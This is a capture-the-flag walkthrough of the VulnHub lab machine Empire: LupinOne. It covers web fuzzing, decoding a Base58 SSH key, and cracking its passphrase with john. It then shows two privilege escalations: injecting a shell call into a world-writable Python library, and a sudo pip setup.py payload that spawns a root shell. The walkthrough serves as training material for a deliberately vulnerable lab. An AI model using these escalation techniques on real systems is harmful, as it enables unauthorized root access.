
Empire: LupinOne

Setup VulnHub Machine: –

  1. First, download the zip file from VulnHub (https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip).
  2. Extract the .zip file.
  3. Open VirtualBox and click New. Fill in the name, type, and version.
  4. Click Next, customize the memory size, and then browse to the existing virtual disk file.
  5. After completion, check whether the Network Adapter is set to Host-only Adapter.
  6. Once you are done with the settings, start the VM.
  7. The instance is now ready and shows a terminal screen that prompts us for the password.

The Walkthrough: – 

Step 1:- (Enumeration)

 
Find the target IP address using NetDiscover.

┌──(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0

From the scan result, we discovered the target IP address, 192.168.56.103. Next, we perform a network scan to detect which ports are open, an essential part of the enumeration process. This helps us better understand the attack surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:

  • -sC: perform a script scan using the default set of scripts,
  • -sV: enables version detection, which will detect what versions are running on what port.

┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.56.103
[sudo] password for rootharsh:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 17:28 IST
Nmap scan report for 192.168.56.103
Host is up (0.012s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 edead9d3af199c8e4e0f31dbf25d1279 (RSA)
| 256 bf9fa993c58721a36b6f9ee68761f519 (ECDSA)
|_ 256 ac18eccc35c051f56f4774c30195b40f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.71 seconds

From the Nmap output, we have spotted two open ports. 

  • Port 22/TCP runs an SSH service, which means that with a valid username and password we could easily access the server.
  • Port 80/TCP runs an HTTP service, which indicates that there might be a website running.

In the script output above, you will see that there is a robots.txt file disallowing a directory called /~myfiles on the web server.

To look at the contents, open a web browser and navigate to the target’s IP address in the URL bar at the top of the window.

In the robots.txt file, you can spot an entry that is disallowed from being crawled.

Let’s visit it.

We began the enumeration by inspecting the /~myfiles page. It returned an Error 404, which seemed suspicious.

Note:-
In older versions of the Apache server, the tilde symbol (~) was used to refer to the home directory of a user.

However, this is not the case for newer versions. So, we can try to find similar paths that start with the same symbol (~). Let’s look at the page source code to find a clue for gaining a foothold on the instance.
(If there is nothing special in the page source, move on to the next steps.)

Step 2:- (Foothold)

Now we are going to find hidden directories and files on the web server, a technique that falls under fuzzing. The tool we are going to use is FFUF (a fast web fuzzer). FFUF does not come pre-installed with Kali Linux, so we have to install it separately. Install and learn more: https://github.com/ffuf/ffuf
Let’s perform fuzzing to find hidden files and directories.

  • -c: colorize the output,  
  • -u: set the Target URL,  
  • -w: set the Wordlist file path. 

┌──(rootharsh㉿kali)-[~/Downloads/tools/ffuf]
└─$ ffuf -c -u http://192.168.56.103//~FUZZ -w /usr/share/wordlists/dirb/common.txt

        /'_\  /'_\           /'_\      
       /\ \_/ /\ \/  _  _  /\ \_/      
       \ \ ,_\\ \ ,\/\ \/\ \ \ \ ,_\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \__/  \ \_\      
          \//    \//   \/_/    \/_/      

       v2.0.0-dev
________________

 :: Method           : GET
 :: URL              : http://192.168.56.103//~FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________

[Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 8ms]
    * FUZZ: secret

:: Progress: [4614/4614] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::  

The scan results identified ‘secret’ as a valid directory name from the server. So let us open this directory in the browser. 

The page contained three major hints for the machine.

  1. The first hint is that there is a hidden file containing the SSH private key.
  2. Secondly, we have a wordlist that will help us crack the SSH hash.
  3. Finally, the hint also mentions a best friend; this is possibly a username.

So, our first task is to find the hidden file that contains the SSH key. To find it, we again use fuzzing with FFUF, this time with three new parameters.

  • -ic: ignore wordlist comments.  
  • -fc: filter HTTP status codes from the response.  
  • -e: specify the list of extensions.

┌──(rootharsh㉿kali)-[~/Downloads/tools/ffuf]
└─$ ffuf -c -ic -u http://192.168.56.103/~secret/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 403 -e .txt,.html

        /'_\  /'_\           /'_\      
       /\ \_/ /\ \/  _  _  /\ \_/      
       \ \ ,_\\ \ ,\/\ \/\ \ \ \ ,_\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \__/  \ \_\      
          \//    \//   \/_/    \/_/      

       v2.0.0-dev
________________

 :: Method           : GET
 :: URL              : http://192.168.56.103/~secret/.FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
 :: Extensions       : .txt .html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 3ms]
    * FUZZ:

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 27ms]
    * FUZZ:

[Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 6ms]
    * FUZZ: mysecret.txt

:: Progress: [262953/262953] :: Job [1/1] :: 4166 req/sec :: Duration: [0:01:05] :: Errors: 0 ::

After completing the scan, we identified one file that returned a 200 response from the server. So, let’s open that file in the browser.

When we open the file in the browser, we see a page that appears to contain an encoded message. We need to figure out the encoding type to decode the actual SSH key.

Visit CyberChef. Learn more: https://github.com/gchq/CyberChef

Paste the string into the input section, then drag and drop operations into the recipe one at a time to find the matching encoding. After analyzing, I found that the string is encoded with Base58.

The string was successfully decoded without any errors. We have identified an SSH private key that can be used for SSH login on the target machine.
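What CyberChef does in this step can be reproduced offline. The following is an added example, not part of the original walkthrough: it checks whether a blob fits the Base58 alphabet, decodes it, and looks for a private-key header. The Bitcoin alphabet, the function names and the sample blob are assumptions; the sample is constructed and is not the key from the target.

```python
# Assumption: the standard Bitcoin Base58 alphabet (no 0, O, I or l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def looks_like_base58(text):
    """Necessary (not sufficient) test: every non-space character is in the alphabet."""
    chars = "".join(text.split())
    return bool(chars) and all(c in B58_ALPHABET for c in chars)


def b58decode(text):
    """Decode Base58 text to bytes; each leading '1' stands for one leading zero byte."""
    chars = "".join(text.split())
    num = 0
    for c in chars:
        idx = B58_ALPHABET.find(c)
        if idx < 0:
            raise ValueError(f"{c!r} is not a Base58 character")
        num = num * 58 + idx
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    zeros = len(chars) - len(chars.lstrip("1"))
    return b"\x00" * zeros + body


def b58encode(data):
    """Inverse of b58decode, used here only to build the constructed sample."""
    num = int.from_bytes(data, "big")
    out = ""
    while num:
        num, rem = divmod(num, 58)
        out = B58_ALPHABET[rem] + out
    zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * zeros + out


def is_private_key(blob):
    """Check decoded bytes for a PEM/OpenSSH private-key header."""
    return blob.lstrip().startswith(b"-----BEGIN") and b"PRIVATE KEY-----" in blob


# Constructed sample: a placeholder, not a real key.
SAMPLE = b58encode(b"-----BEGIN OPENSSH PRIVATE KEY-----\n(placeholder body)\n")

if __name__ == "__main__":
    print(looks_like_base58(SAMPLE), is_private_key(b58decode(SAMPLE)))
```

Base58 is an encoding with no key, so a private key published this way is only as protected as its passphrase.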

Save the key into the file using the nano text editor.

┌──(rootharsh㉿kali)-[~]
└─$ sudo nano ssh_key.rsa
[sudo] password for rootharsh:

Since the author has shared some hints related to the passphrase for the SSH key, we are going to use ssh2john to obtain the hash value of the SSH key.

┌──(rootharsh㉿kali)-[~]
└─$ locate ssh2john
/usr/bin/ssh2john
/usr/share/john/ssh2john.py
/usr/share/john/__pycache__/ssh2john.cpython-310.pyc

┌──(rootharsh㉿kali)-[~]
└─$ /usr/share/john/ssh2john.py ssh_key.rsa > ssh_hash

┌──(rootharsh㉿kali)-[~]
└─$ cat ssh_hash
ssh_key.rsa:$sshng$2$16$f2df77361693c16003677b8a33deeb06$2486$[...]$16$614

Now, run John the Ripper to crack the hash value.

┌──(rootharsh㉿kali)-[~]
└─$ john --wordlist=/usr/share/set/src/fasttrack/wordlist.txt  ssh_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd!        (ssh_key.rsa)    
1g 0:00:00:02 DONE (2023-03-10 15:59) 0.3484g/s 16.72p/s 16.72c/s 16.72C/s Spring2017..Welcome1212
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

From the output, we obtained a password. Now that we have a username and a password, let’s open a secure shell (SSH) connection to the target using them.

┌──(rootharsh㉿kali)-[~]
└─$ ssh -i ssh_key.rsa icex64@192.168.56.103
Enter passphrase for key 'ssh_key.rsa': P@55w0rd!  
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Thu Oct  7 05:41:43 2021 from 192.168.26.4

We successfully authenticated and got a secure shell. As shown, we now have access as the user icex64. Next, run the ls command to list the files and directories. As a result, we found user.txt.

Since the current shell does not have root permissions, let’s gather further information about the target machine that could be useful for gaining root access.

Step 3:- (Privilege Escalation)

Let’s identify the rights and privileges of the current user by executing the sudo -l command.

icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$

After analyzing the output, we see that the permitted Python script may be vulnerable to Python library hijacking. You can find out more about this technique by searching on Google. Let’s take a look at the contents of the Python script.

icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")
icex64@LupinOne:~$

After analyzing the script we found a piece of important information.

Note:- If we execute this Python script, it will call the webbrowser library and display the URL in the browser interface. What if we inject a bash shell call into that library and execute the program again to escalate privileges?

So, we have to find the location of the library using the locate command.

icex64@LupinOne:~$ locate webbrowser
/usr/lib/python3.9/__pycache__/webbrowser.cpython-39.pyc
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$

From the output, we have obtained the location of the Python library “webbrowser.py”. We will now begin our Python library hijacking procedure. First, list the details of the library file to check its read and write permissions.

icex64@LupinOne:~$ ls -al /usr/lib/python3.9/webbrowser.py
-rwxrwxrwx 1 root root 24110 Feb 10 08:54 /usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$

The file is world-writable (-rwxrwxrwx), so the current user can modify it. Open the library with the nano command to edit it.

icex64@LupinOne:~$ nano /usr/lib/python3.9/webbrowser.py

Now add the line below to spawn a shell.

os.system("/bin/bash")

Let’s execute the python script to switch the user to Arsene. 

icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/home/icex64$

We have switched to the user arsene, but we still don’t have root privileges, so let’s again identify the rights and privileges of the current user, arsene.

arsene@LupinOne:/home/icex64$ sudo -l
Matching Defaults entries for arsene on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
arsene@LupinOne:/home/icex64$

After analyzing the output, we spotted a new misconfiguration that will help us escalate privileges. This is known as pip privilege escalation. You can find detailed information by searching on Google.

Copy each of the commands below and paste them into the terminal one by one to get the root shell.

arsene@LupinOne:/home/icex64$ TF=$(mktemp -d)
arsene@LupinOne:/home/icex64$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
arsene@LupinOne:/home/icex64$ sudo pip install $TF
Processing /tmp/tmp.UqEhvH8ffJ
# whoami
root
#

Finally, we have the root shell, which we verify using the whoami command. Having confirmed that we are root, simply change to the /root directory to obtain the root flag.

# cd /root
# ls
root.txt
# cat root.txt
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
See you on the next heist.
#

Congratulations on completing the CTF challenge!
